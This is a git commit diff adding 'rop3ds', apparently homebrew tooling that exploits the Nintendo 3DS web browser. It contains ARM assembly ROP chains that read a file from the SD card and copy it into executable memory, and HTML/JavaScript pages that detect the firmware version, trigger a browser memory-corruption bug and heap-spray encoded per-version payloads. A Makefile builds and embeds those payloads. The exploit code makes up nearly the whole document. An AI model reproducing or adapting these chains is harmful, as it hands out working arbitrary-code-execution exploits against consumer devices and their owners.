init commit take 2

2015-08-04 21:57:37 -04:00
commit e2b7f1e607
90 changed files with 16818 additions and 0 deletions
--- a/mset/rop3ds/DownloadCode.S
+++ b/mset/rop3ds/DownloadCode.S
@@ -0,0 +1,65 @@
+	.arm
+	.text
+
+#include "rop.h"
+
+#ifdef ARM_CODE
+	#define CODE_SIZE		arm_code_end-arm_code
+#else
+	#define CODE_SIZE		0x300*15-0x460
+#endif
+
+	.global	_start
+@---------------------------------------------------------------------------------
+_start:
+	rop_memcpy(BUFFER_LOC+0x300*0, ROP_LOC+0x304*1, 0x300)
+	rop_memcpy(BUFFER_LOC+0x300*1, ROP_LOC+0x304*2, 0x300)
+	rop_memcpy(BUFFER_LOC+0x300*2, ROP_LOC+0x304*3, 0x300)
+	rop_memcpy(BUFFER_LOC+0x300*3, ROP_LOC+0x304*4, 0x300)
+
+	rop_memcpy(BUFFER_LOC+0x300*4, ROP_LOC+0x1400+0x304*0, 0x300)
+	rop_memcpy(BUFFER_LOC+0x300*5, ROP_LOC+0x1400+0x304*1, 0x300)
+	rop_memcpy(BUFFER_LOC+0x300*6, ROP_LOC+0x1400+0x304*2, 0x300)
+	rop_memcpy(BUFFER_LOC+0x300*7, ROP_LOC+0x1400+0x304*3, 0x300)
+	rop_memcpy(BUFFER_LOC+0x300*8, ROP_LOC+0x1400+0x304*4, 0x300)
+
+	rop_memcpy(BUFFER_LOC+0x300*9, ROP_LOC+0x2800+0x304*0, 0x300)
+	rop_memcpy(BUFFER_LOC+0x300*10, ROP_LOC+0x2800+0x304*1, 0x300)
+	rop_memcpy(BUFFER_LOC+0x300*11, ROP_LOC+0x2800+0x304*2, 0x300)
+	rop_memcpy(BUFFER_LOC+0x300*12, ROP_LOC+0x2800+0x304*3, 0x300)
+	rop_memcpy(BUFFER_LOC+0x300*13, ROP_LOC+0x2800+0x304*4, 0x300)
+
+	rop_fs_mount(DMC)
+
+	.fill 3, 4, POP_PC
+	.word POP_R0_PC
+@.org 0x21C
+	.word MAGIC
+
+	rop_flush_data_cache(BUFFER_LOC+arm_code-0x300, CODE_SIZE)
+	rop_gx_texture_copy(BUFFER_LOC+arm_code-0x300, CODE_TARGET, CODE_SIZE)
+	rop_flush_data_cache(BUFFER_LOC, 0x38400*2)
+	rop_gx_texture_copy(BUFFER_LOC, 0x1F48F000, 0x38400*2)
+	rop_sleep(1000000000)
+
+@	rop_sleep(1000000000)
+@	rop_flush_data_cache(BUFFER_LOC, 0x38400)
+@	rop_gx_texture_copy(BUFFER_LOC, 0x1F4C7800, 0x38400)
+@	rop_sleep(1000000000)
+
+	rop_jump_arm
+
+.org 0x300
+.org 0x3F4
+	.word ROP_LOC+_start+0x8C
+.org 0x428
+	.word ROP_LOC+_start, 0, POP_PC
+.org 0x458
+	.word POP_PC, POP_PC
+arm_code:
+#ifdef ARM_CODE
+	#define S_(x)	#x
+	#define S(x)	S_(x)
+	.incbin S(ARM_CODE)
+#endif
+arm_code_end:
--- a/mset/rop3ds/LICENSE
+++ b/mset/rop3ds/LICENSE
@@ -0,0 +1,7 @@
+Copyright (c) 2015 dukesrg, bilis
+
+ Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
+
+ The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
+
+ THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
--- a/mset/rop3ds/LoadCode.S
+++ b/mset/rop3ds/LoadCode.S
@@ -0,0 +1,34 @@
+	.arm
+	.text
+
+#include "rop.h"
+
+#ifndef SPIDER_ARM_CODE_SIZE
+	#define SPIDER_ARM_CODE_SIZE 0x00004000
+#endif
+
+	.global	_start
+@---------------------------------------------------------------------------------
+_start:
+	rop_fs_mount(DMC)
+	rop_file_open(THIS, FileName, FILE_READ)
+	rop_store(THIS+4, SPIDER_ARM_CODE_OFFSET)
+	rop_file_read(THIS, THIS+0x20, BUFFER_LOC, SPIDER_ARM_CODE_SIZE)
+	rop_flush_data_cache(BUFFER_LOC, SPIDER_ARM_CODE_SIZE)
+	rop_gx_texture_copy(BUFFER_LOC, CODE_TARGET, SPIDER_ARM_CODE_SIZE)
+	rop_sleep(1000000000)
+	rop_jump_arm
+@.org 0x0F4, GARBAGE
+	.fill 3, 4, GARBAGE
+	.word ROP_LOC+_start+0x8C
+@.org 0x128, GARBAGE
+	.fill 12, 4, GARBAGE
+	.word ROP_LOC+_start, 0, POP_PC
+@.org 0x158, GARBAGE
+	.fill 9, 4, GARBAGE
+	.fill 2, 4, POP_PC
+FileName:
+	.string16 "dmc:/"
+@.org 0x21C, GARBAGE
+	.fill 44, 4, GARBAGE
+	.word MAGIC
--- a/mset/rop3ds/LoadCodeMset.S
+++ b/mset/rop3ds/LoadCodeMset.S
@@ -0,0 +1,18 @@
+	.arm
+	.text
+
+#include "rop.h"
+
+#ifndef MSET_ARM_CODE_SIZE
+	#define MSET_ARM_CODE_SIZE 0x00004000
+#endif
+
+	.global	_start
+@---------------------------------------------------------------------------------
+_start:
+	rop_store(THIS+4, ARM_CODE_OFFSET)
+	rop_file_read(THIS, THIS+0x20, BUFFER_LOC, MSET_ARM_CODE_SIZE)
+	rop_flush_data_cache(BUFFER_LOC, MSET_ARM_CODE_SIZE)
+	rop_gx_texture_copy(BUFFER_LOC, CODE_TARGET, MSET_ARM_CODE_SIZE)
+	rop_sleep(1000000000)
+	rop_jump_arm
--- a/mset/rop3ds/Makefile
+++ b/mset/rop3ds/Makefile
@@ -0,0 +1,110 @@
+ifeq ($(strip $(DEVKITARM)),)
+$(error "Please set DEVKITARM in your environment. export DEVKITARM=<path to>devkitARM")
+endif
+
+include $(DEVKITARM)/base_rules
+
+all: index.html compat.html rop.dat LoadCode.dat LoadCodeMset.dat
+
+%.dat: %.elf
+	@$(OBJCOPY) -O binary $^ $@
+%.elf: %.S
+	@$(CC) -c -o $@ $< $(ASFLAGS)
+
+bin2utf8:
+	@gcc *.c -o bin2utf8.exe -std=c99
+
+%.utf8: %.dat bin2utf8
+	@./bin2utf8.exe $< >$@
+
+define makepayload
+	@echo "generating $(2) ROP"
+	@make -s LoadCode.dat ASFLAGS="-D$(2) -DSPIDER_ARM_CODE_OFFSET=$(3) -D$(4)"
+	@make -s LoadCode.utf8
+	@sed -e "/$(1)'/{rLoadCode.utf8" -e "N}" -i $(5)
+	@sed "/$(1)'/s/\(.*\)\(\t\{3\}.*:'\)/\2\1/" -i $(5)
+	@rm LoadCode.dat
+	@rm LoadCode.utf8
+endef
+
+index.html: index.html.template bin2utf8
+	@cp -f $< $@
+	$(call makepayload,17498,SPIDER_4X,0,NO_SPIDER_DG,$@)
+	$(call makepayload,17538C45,SPIDER_45_CN,0,NO_SPIDER_DG,$@)
+	$(call makepayload,17538C42,SPIDER_42_CN,0,NO_SPIDER_DG,$@)
+	$(call makepayload,17538K,SPIDER_4X_KR,0,NO_SPIDER_DG,$@)
+	$(call makepayload,17538T,SPIDER_4X_TW,0,NO_SPIDER_DG,$@)
+	$(call makepayload,17552,SPIDER_5X,0,NO_SPIDER_DG,$@)
+	$(call makepayload,17552C,SPIDER_5X_CN,0,NO_SPIDER_DG,$@)
+	$(call makepayload,17552K,SPIDER_5X_KR,0,NO_SPIDER_DG,$@)
+	$(call makepayload,17552T,SPIDER_5X_TW,0,NO_SPIDER_DG,$@)
+	$(call makepayload,17567,SPIDER_9X,0,NO_SPIDER_DG,$@)
+	$(call makepayload,17567C,SPIDER_9X_CN,0,NO_SPIDER_DG,$@)
+	$(call makepayload,17567K,SPIDER_9X_KR,0,NO_SPIDER_DG,$@)
+	$(call makepayload,17567T,SPIDER_9X_TW,0,NO_SPIDER_DG,$@)
+	
+compat.html: index.html.template bin2utf8
+	@cp -f $< $@
+	$(call makepayload,17498,SPIDER_4X,0,SPIDER_DG,$@)
+	$(call makepayload,17538C45,SPIDER_45_CN,0,SPIDER_DG,$@)
+	$(call makepayload,17538C42,SPIDER_42_CN,0,SPIDER_DG,$@)
+	$(call makepayload,17538K,SPIDER_4X_KR,0,SPIDER_DG,$@)
+	$(call makepayload,17538T,SPIDER_4X_TW,0,SPIDER_DG,$@)
+
+define makebigpayload
+	@echo "generating $(2) ROP"
+	@./bin2utf8.exe $(1).rop >rop.utf8
+	@sed -e "/$(1)'/{rrop.utf8" -e "N}" -i $(5)
+	@sed "/$(1)'/s/\(.*\)\(\t\{3\}.*:'\)/\2\1/" -i $(5)
+	@rm rop.utf8
+endef
+
+big.html: index.html.template bin2utf8
+	@cp -f $< $@
+	$(call makebigpayload,17498,SPIDER_4X,0,NO_SPIDER_DG,$@)
+	$(call makebigpayload,17538C45,SPIDER_45_CN,0,NO_SPIDER_DG,$@)
+	$(call makebigpayload,17538C42,SPIDER_42_CN,0,NO_SPIDER_DG,$@)
+	$(call makebigpayload,17538K,SPIDER_4X_KR,0,NO_SPIDER_DG,$@)
+	$(call makebigpayload,17538T,SPIDER_4X_TW,0,NO_SPIDER_DG,$@)
+	$(call makebigpayload,17552,SPIDER_5X,0,NO_SPIDER_DG,$@)
+	$(call makebigpayload,17552C,SPIDER_5X_CN,0,NO_SPIDER_DG,$@)
+	$(call makebigpayload,17552K,SPIDER_5X_KR,0,NO_SPIDER_DG,$@)
+	$(call makebigpayload,17552T,SPIDER_5X_TW,0,NO_SPIDER_DG,$@)
+	$(call makebigpayload,17567,SPIDER_9X,0,NO_SPIDER_DG,$@)
+	$(call makebigpayload,17567C,SPIDER_9X_CN,0,NO_SPIDER_DG,$@)
+	$(call makebigpayload,17567K,SPIDER_9X_KR,0,NO_SPIDER_DG,$@)
+	$(call makebigpayload,17567T,SPIDER_9X_TW,0,NO_SPIDER_DG,$@)
+
+define makedatpayload
+	@echo "generating $(2) ROP"
+	@make -s DownloadCode.dat ASFLAGS="-D$(2) -DSPIDER_ARM_CODE_OFFSET=$(3) -D$(4)"
+	@mv DownloadCode.dat $(1).dat
+endef
+
+datpayload: download.html.template
+	$(call makedatpayload,17498,SPIDER_4X,0,NO_SPIDER_DG)
+	$(call makedatpayload,17538C45,SPIDER_45_CN,0,NO_SPIDER_DG)
+	$(call makedatpayload,17538C42,SPIDER_42_CN,0,NO_SPIDER_DG)
+	$(call makedatpayload,17538K,SPIDER_4X_KR,0,NO_SPIDER_DG)
+	$(call makedatpayload,17538T,SPIDER_4X_TW,0,NO_SPIDER_DG)
+	$(call makedatpayload,17552,SPIDER_5X,0,NO_SPIDER_DG)
+	$(call makedatpayload,17552C,SPIDER_5X_CN,0,NO_SPIDER_DG)
+	$(call makedatpayload,17552K,SPIDER_5X_KR,0,NO_SPIDER_DG)
+	$(call makedatpayload,17552T,SPIDER_5X_TW,0,NO_SPIDER_DG)
+	$(call makedatpayload,17567,SPIDER_9X,0,NO_SPIDER_DG)
+	$(call makedatpayload,17567C,SPIDER_9X_CN,0,NO_SPIDER_DG)
+	$(call makedatpayload,17567K,SPIDER_9X_KR,0,NO_SPIDER_DG)
+	$(call makedatpayload,17567T,SPIDER_9X_TW,0,NO_SPIDER_DG)
+	@cp -f $< download.html
+
+datpayloadcompat: download.html.template
+	$(call makedatpayload,17498,SPIDER_4X,0,SPIDER_DG)
+	$(call makedatpayload,17538C45,SPIDER_45_CN,0,SPIDER_DG)
+	$(call makedatpayload,17538C42,SPIDER_42_CN,0,SPIDER_DG)
+	$(call makedatpayload,17538K,SPIDER_4X_KR,0,SPIDER_DG)
+	$(call makedatpayload,17538T,SPIDER_4X_TW,0,SPIDER_DG)
+	@cp -f $< download.html
+
+.PHONY: clean
+clean:
+	@rm -rf *.elf *.dat *.rop *.exe *.utf8 *.html
--- a/mset/rop3ds/bin2utf8.c
+++ b/mset/rop3ds/bin2utf8.c
@@ -0,0 +1,43 @@
+#include <stdio.h>
+int main(int argc, const char *argv[])
+{
+	FILE *file;
+	unsigned int state;
+	unsigned short data, prevdata = 1;
+
+	if (argc != 2)
+	{
+		fprintf(stderr, "Usage: %s input-file\n", argv[0]);
+		return 255;
+	}
+
+	if ((file = fopen(argv[1], "rb")) == NULL)
+	{
+		perror("fopen");
+		return 1;
+	}
+
+	while (fread(&data, 2, 1, file) == 1)
+	{
+		if (data == 0){
+			printf("\\0");
+		}else if (data == '\r' || data == '\n'){
+			printf("\\%03o", data);
+		}else if (((prevdata == 0) && (data >= '0') && (data <= '7'))){
+			printf("00%c", data);
+		}else if ((data == '\'') || /*(data == '"') ||*/ (data == '\\')){
+			printf("\\%c", (char)data);
+		}else if (data == 0x2028 || ((data >= 0xD800) && (data <= 0xDFFF))){
+			printf("\\u%04x", data);
+		}else if (data < 0x80){
+			printf("%c", (char)data);
+		}else if (data < 0x800){
+			printf("%c%c", ((data >> 6) & 0x1F) | 0xC0, (data & 0x3F) | 0x80);
+		}else{
+			printf("%c%c%c",  ((data >> 12) & 0x0F) | 0xE0, ((data >> 6) & 0x3F) | 0x80, ((data) & 0x3F) | 0x80);
+		}
+		prevdata = data;
+	}
+	fclose(file);
+	return 0;
+}
--- a/mset/rop3ds/bin2utf8.exe
+++ b/mset/rop3ds/bin2utf8.exe
--- a/mset/rop3ds/compat.html
+++ b/mset/rop3ds/compat.html
@@ -0,0 +1,51 @@
+<html><head><script>
+d=document,r=parent,w=window,n=navigator.userAgent;
+if(r==w){
+	l='arm.dat',u=decodeURI(d.URL),g=u.split('?');
+	if(g.length>1){
+		g=g[1].split('&');
+		if(g[0].length>0&&g[0].length<25)l=g[0];
+	}
+	d.title='Load '+l;
+	w.onload=function(){
+		if(n.indexOf('1.7538.CN')>=0)n=n.replace('.CN',confirm('系统版本4.2-4.4选择OK，系统版本4.5选择取消。')?'.CN.42':'.CN.45');
+		d.body.childNodes[0].innerHTML=l+' loading<iframe height=0 src=#/>';
+	}
+}else{
+	w.onload=function(){
+		b=0,f=w.frameElement,p=f.parentNode,o=d.createElement('object');
+		o.addEventListener('beforeload',function(){
+			if(++b==1)p.addEventListener('DOMSubtreeModified',r.z);
+			else if(b==2)p.removeChild(f);
+		});
+		d.body.appendChild(o);
+	}
+}
+function z(){
+	if(n.indexOf('Nintendo 3DS')>=0){
+		m=[],q={'17412':'',
+			'17455':'',
+			'17498':'樴-\udb6c해*弧*⯨3樴-\udb6c해*찀ॸ瑐!畠ࢴ\0@#낤%해*찄ॸ靘&\0\0鮔@#樴-\udb6c해*찀ॸ瑐!찠ॸ\0ᡁ䀀\0죤/樴-\udb6c해*搼;瑐!老\0ᡁ䀀\0䰬4해*啀?靘&璬ࢴ,\0\0ᡁကᥝ䀀\0해*\0樴-\udb6c해*쨀㮚靘&\0\0儼* @#@#@#璌ࢴ@#@#@#@#@#@#@#@#@#@#@#@#琀ࢴ\0\0\udb6c@#@#@#@#@#@#@#@#@#\udb6c\udb6cdmc:/\0@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#樜-',
+			'17538C42':'ﺘ垴싸傟뙀ﺘ垴싸찀ॸ㷈Š࣌\0@#"싸찄ॸ欬"\0\0暄@#ﺘ垴싸찀ॸ㷈찠ॸ\0ᡁ䀀\0璼ﺘ垴싸霄=㷈老\0ᡁ䀀\0봜싸沘=欬"¬࣌멄\0\0ᡁ　ᥙ䀀\0\0ﺘ垴싸쨀㮚欬"\0\0䈘 @#@#@#࣌@#@#@#@#@#@#@#@#@#@#@#@#\0࣌\0\0垴@#@#@#@#@#@#@#@#@#垴垴dmc:/\0@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#ﺀ',
+			'17538C45':'ﺨ埤쌤像넸ﺨ埤쌤찀ॸ㷀Š࣌\0@#"쌤찄ॸ櫸"\0\0暴@#ﺨ埤쌤찀ॸ㷀찠ॸ\0ᡁ䀀\0濈ﺨ埤쌤霄=㷀老\0ᡁ䀀\0봰쌤沘=櫸"¬࣌멘\0\0ᡁ　ᥙ䀀\0\0ﺨ埤쌤쨀㮚櫸"\0\0䈌 @#@#@#࣌@#@#@#@#@#@#@#@#@#@#@#@#\0࣌\0\0埤@#@#@#@#@#@#@#@#@#埤埤dmc:/\0@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#ﺐ',
+			'17538K':'﹬垴싸傟쉘﹬垴싸찀ॸ㷈Š࣍\0@#"싸찄ॸ稨"\0\0暄@#﹬垴싸찀ॸ㷈찠ॸ\0ᡁ䀀\0胸﹬垴싸꜄=㷈老\0ᡁ䀀\0볰싸粘=稨"¬࣍먘\0\0ᡁ ᥙ䀀\0\0﹬垴싸쨀㮚稨"\0\0䈘 @#@#@#࣍@#@#@#@#@#@#@#@#@#@#@#@#\0࣍\0\0垴@#@#@#@#@#@#@#@#@#垴垴dmc:/\0@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#﹔',
+			'17538T':'ﺘ垴싸傟쉠ﺘ垴싸찀ॸ㷈Š࣍\0@#"싸찄ॸ穤"\0\0暄@#ﺘ垴싸찀ॸ㷈찠ॸ\0ᡁ䀀\0胼ﺘ垴싸꜄=㷈老\0ᡁ䀀\0봜싸粘=穤"¬࣍멄\0\0ᡁ ᥙ䀀\0\0ﺘ垴싸쨀㮚穤"\0\0䈘 @#@#@#࣍@#@#@#@#@#@#@#@#@#@#@#@#\0࣍\0\0垴@#@#@#@#@#@#@#@#@#垴垴dmc:/\0@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#ﺀ',
+			'17552':'',
+			'17552C':'',
+			'17552K':'',
+			'17552T':'',
+			'17567':'',
+			'17567C':'',
+			'17567K':'',
+			'17567T':''
+		}[n.split('/').pop().replace(/[^\dCKT]/g,'')],
+		s=q.indexOf("dmc:/")+5;
+		q=q.substring(0,s)+l+"\0"+q.slice(s+l.length+1);
+		q+=Array(384-q.length+1+1).join('\0');
+		for(j=1;j<410;j++){
+			i=j/96,a=Array(j);
+			for(k=0;k<i;a[k++]=q);
+			m.push(d.createTextNode(String.fromCharCode.apply(null,Array(a))));
+		}
+	}
+}</script></head><body><h1>.</h1></body></html>
--- a/mset/rop3ds/download.html.template
+++ b/mset/rop3ds/download.html.template
@@ -0,0 +1,71 @@
+<html><head><script>
+d=document,r=parent,w=window,n=navigator.userAgent;
+if(r==w){
+	l='reiNand.dat',g=decodeURI(d.URL).split('?');
+	if(g.length>1){
+		g=g[1].split('&');
+		if(g[0].length>0&&g[0].length<25)l=g[0];
+	}
+	d.title='Load '+l;
+	w.onload=function(){
+		if(n.indexOf('1.7538.CN')>=0)n=n.replace('.CN',confirm('系统版本4.2-4.4选择OK，系统版本4.5选择取消。')?'.CN.42':'.CN.45');
+		var h=d.body.childNodes[0];
+		var v=n.split('/').pop().replace(/[^\dCKT]/g,'')+'.rop';
+		h.innerHTML='Downloading payload '+v+': ';
+		var x=new XMLHttpRequest();
+		x.open('GET',v,true);
+		x.overrideMimeType('text/plain; charset=x-user-defined');
+		x.onload=function(){
+			if(x.status==200){
+				var u='OK<br>Patching filename to '+l+': ';
+				var s=x.responseText;
+				var y=s.length;
+				var t=Array(y<768?768:y);
+				for(i=0;i<y;t[i]=s.charCodeAt(i)&255,i++);
+				y=t.length>>1;
+				for(i=0;i<y;t[i]=t[i*2]|t[i*2+1]<<8,i++);
+				t.length>>=1;
+				s=String.fromCharCode.apply(null,t);
+				y=s.indexOf('dmc:/')+5;
+				if(y>4){
+					s=s.substring(0,y)+l+'\0'+s.slice(y+l.length+1);
+					u+='OK';
+				}else{
+					u+='skipped';
+				}
+				if(s.length<=384)s+=Array(384-s.length+1).join('\0')+s;
+				s+=Array(384*15-s.length+1+1).join('\0');
+				q=[];
+				for(k=0,i=0;k<15;q[k++]=s.substring(i,i+385),i+=384);
+				u+='<br>Executing payload...<iframe height=0 src=#/>';
+			}else{
+				u='failed';
+			}
+			h.innerHTML+=u;
+		}
+		x.send();
+	}
+}else{
+	w.onload=function(){
+		b=0,f=w.frameElement,p=f.parentNode,o=d.createElement('object');
+		o.addEventListener('beforeload',function(){
+			if(++b==1)p.addEventListener('DOMSubtreeModified',r.z);
+			else if(b==2)p.removeChild(f);
+		});
+		d.body.appendChild(o);
+	}
+}
+function z(){
+	if(n.indexOf('Nintendo 3DS')>=0){
+		m=[];
+		for(j=0;j<410;j++){
+			a=Array(j);
+			if(384<j&&j<388){
+				for(k=0,i=(j-385)*5;k<5;a[k++]=q[i++]);
+			}else{
+				for(k=0,i=j/96;k<i;a[k++]=q[1]);
+			}
+			m.push(d.createTextNode(String.fromCharCode.apply(null,Array(a))));
+		}
+	}
+}</script></head><body><h1>.</h1></body></html>
--- a/mset/rop3ds/index.html
+++ b/mset/rop3ds/index.html
@@ -0,0 +1,51 @@
+<html><head><script>
+d=document,r=parent,w=window,n=navigator.userAgent;
+if(r==w){
+	l='arm.dat',u=decodeURI(d.URL),g=u.split('?');
+	if(g.length>1){
+		g=g[1].split('&');
+		if(g[0].length>0&&g[0].length<25)l=g[0];
+	}
+	d.title='Load '+l;
+	w.onload=function(){
+		if(n.indexOf('1.7538.CN')>=0)n=n.replace('.CN',confirm('系统版本4.2-4.4选择OK，系统版本4.5选择取消。')?'.CN.42':'.CN.45');
+		d.body.childNodes[0].innerHTML=l+' loading<iframe height=0 src=#/>';
+	}
+}else{
+	w.onload=function(){
+		b=0,f=w.frameElement,p=f.parentNode,o=d.createElement('object');
+		o.addEventListener('beforeload',function(){
+			if(++b==1)p.addEventListener('DOMSubtreeModified',r.z);
+			else if(b==2)p.removeChild(f);
+		});
+		d.body.appendChild(o);
+	}
+}
+function z(){
+	if(n.indexOf('Nintendo 3DS')>=0){
+		m=[],q={'17412':'',
+			'17455':'',
+			'17498':'樴-\udb6c해*弧*⯨3樴-\udb6c해*찀ॸ瑐!畠ࢴ\0@#낤%해*찄ॸ靘&\0\0鮔@#樴-\udb6c해*찀ॸ瑐!찠ॸ\0ᡁ䀀\0죤/樴-\udb6c해*搼;瑐!老\0ᡁ䀀\0䰬4해*啀?靘&璬ࢴ,\0\0ᡁ　᤭䀀\0해*\0樴-\udb6c해*쨀㮚靘&\0\0儼* @#@#@#璌ࢴ@#@#@#@#@#@#@#@#@#@#@#@#琀ࢴ\0\0\udb6c@#@#@#@#@#@#@#@#@#\udb6c\udb6cdmc:/\0@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#樜-',
+			'17538C42':'ﺘ垴싸傟뙀ﺘ垴싸찀ॸ㷈Š࣌\0@#"싸찄ॸ欬"\0\0暄@#ﺘ垴싸찀ॸ㷈찠ॸ\0ᡁ䀀\0璼ﺘ垴싸霄=㷈老\0ᡁ䀀\0봜싸沘=欬"¬࣌멄\0\0ᡁ瀀ᤵ䀀\0\0ﺘ垴싸쨀㮚欬"\0\0䈘 @#@#@#࣌@#@#@#@#@#@#@#@#@#@#@#@#\0࣌\0\0垴@#@#@#@#@#@#@#@#@#垴垴dmc:/\0@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#ﺀ',
+			'17538C45':'ﺨ埤쌤像넸ﺨ埤쌤찀ॸ㷀Š࣌\0@#"쌤찄ॸ櫸"\0\0暴@#ﺨ埤쌤찀ॸ㷀찠ॸ\0ᡁ䀀\0濈ﺨ埤쌤霄=㷀老\0ᡁ䀀\0봰쌤沘=櫸"¬࣌멘\0\0ᡁ瀀ᤵ䀀\0\0ﺨ埤쌤쨀㮚櫸"\0\0䈌 @#@#@#࣌@#@#@#@#@#@#@#@#@#@#@#@#\0࣌\0\0埤@#@#@#@#@#@#@#@#@#埤埤dmc:/\0@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#ﺐ',
+			'17538K':'﹬垴싸傟쉘﹬垴싸찀ॸ㷈Š࣍\0@#"싸찄ॸ稨"\0\0暄@#﹬垴싸찀ॸ㷈찠ॸ\0ᡁ䀀\0胸﹬垴싸꜄=㷈老\0ᡁ䀀\0볰싸粘=稨"¬࣍먘\0\0ᡁ倀ᤥ䀀\0\0﹬垴싸쨀㮚稨"\0\0䈘 @#@#@#࣍@#@#@#@#@#@#@#@#@#@#@#@#\0࣍\0\0垴@#@#@#@#@#@#@#@#@#垴垴dmc:/\0@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#﹔',
+			'17538T':'ﺘ垴싸傟쉠ﺘ垴싸찀ॸ㷈Š࣍\0@#"싸찄ॸ穤"\0\0暄@#ﺘ垴싸찀ॸ㷈찠ॸ\0ᡁ䀀\0胼ﺘ垴싸꜄=㷈老\0ᡁ䀀\0봜싸粘=穤"¬࣍멄\0\0ᡁ倀ᤵ䀀\0\0ﺘ垴싸쨀㮚穤"\0\0䈘 @#@#@#࣍@#@#@#@#@#@#@#@#@#@#@#@#\0࣍\0\0垴@#@#@#@#@#@#@#@#@#垴垴dmc:/\0@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#ﺀ',
+			'17552':'Τ埠쌠僋쨨Τ埠쌠찀ॸ㷀啠ࢸ\0@#﹄"쌠찄ॸ謐"\0\0暰@#Τ埠쌠찀ॸ㷀찠ॸ\0ᡁ䀀\0蛀Τ埠쌠Ꜭ=㷀老\0ᡁ䀀\0숨쌠粘=謐"咬ࢸ뽐\0\0ᡁ ᥙ䀀\0\0Τ埠쌠쨀㮚謐"\0\0䈌 @#@#@#和ࢸ@#@#@#@#@#@#@#@#@#@#@#@#吀ࢸ\0\0埠@#@#@#@#@#@#@#@#@#埠埠dmc:/\0@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#Ό',
+			'17552C':'ﻀ埠쌠僋럐ﻀ埠쌠찀ॸ㷀Š࣌\0@#"쌠찄ॸ犠"\0\0暰@#ﻀ埠쌠찀ॸ㷀찠ॸ\0ᡁ䀀\0甜ﻀ埠쌠꜌=㷀老\0ᡁ䀀\0뵈쌠粘=犠"¬࣌며\0\0ᡁ ᥙ䀀\0\0ﻀ埠쌠쨀㮚犠"\0\0䈌 @#@#@#࣌@#@#@#@#@#@#@#@#@#@#@#@#\0࣌\0\0埠@#@#@#@#@#@#@#@#@#埠埠dmc:/\0@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#ﺨ',
+			'17552K':'ﺔ埠쌠僋쩸ﺔ埠쌠찀ॸ㷀Š࣍\0@#靖"쌠찄ॸ艴"\0\0暰@#ﺔ埠쌠찀ॸ㷀찠ॸ\0ᡁ䀀\0蛼ﺔ埠쌠꜌=㷀老\0ᡁ䀀\0봜쌠粘=艴"¬࣍멄\0\0ᡁ ᥙ䀀\0\0ﺔ埠쌠쨀㮚艴"\0\0䈌 @#@#@#࣍@#@#@#@#@#@#@#@#@#@#@#@#\0࣍\0\0埠@#@#@#@#@#@#@#@#@#埠埠dmc:/\0@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#ﹼ',
+			'17552T':'ﻀ埠쌠僋쫀ﻀ埠쌠찀ॸ㷀Š࣍\0@#ﭜ"쌠찄ॸ苰"\0\0暰@#ﻀ埠쌠찀ॸ㷀찠ॸ\0ᡁ䀀\0蝄ﻀ埠쌠꜌=㷀老\0ᡁ䀀\0뵈쌠粘=苰"¬࣍며\0\0ᡁ ᥙ䀀\0\0ﻀ埠쌠쨀㮚苰"\0\0䈌 @#@#@#࣍@#@#@#@#@#@#@#@#@#@#@#@#\0࣍\0\0埠@#@#@#@#@#@#@#@#@#埠埠dmc:/\0@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#ﺨ',
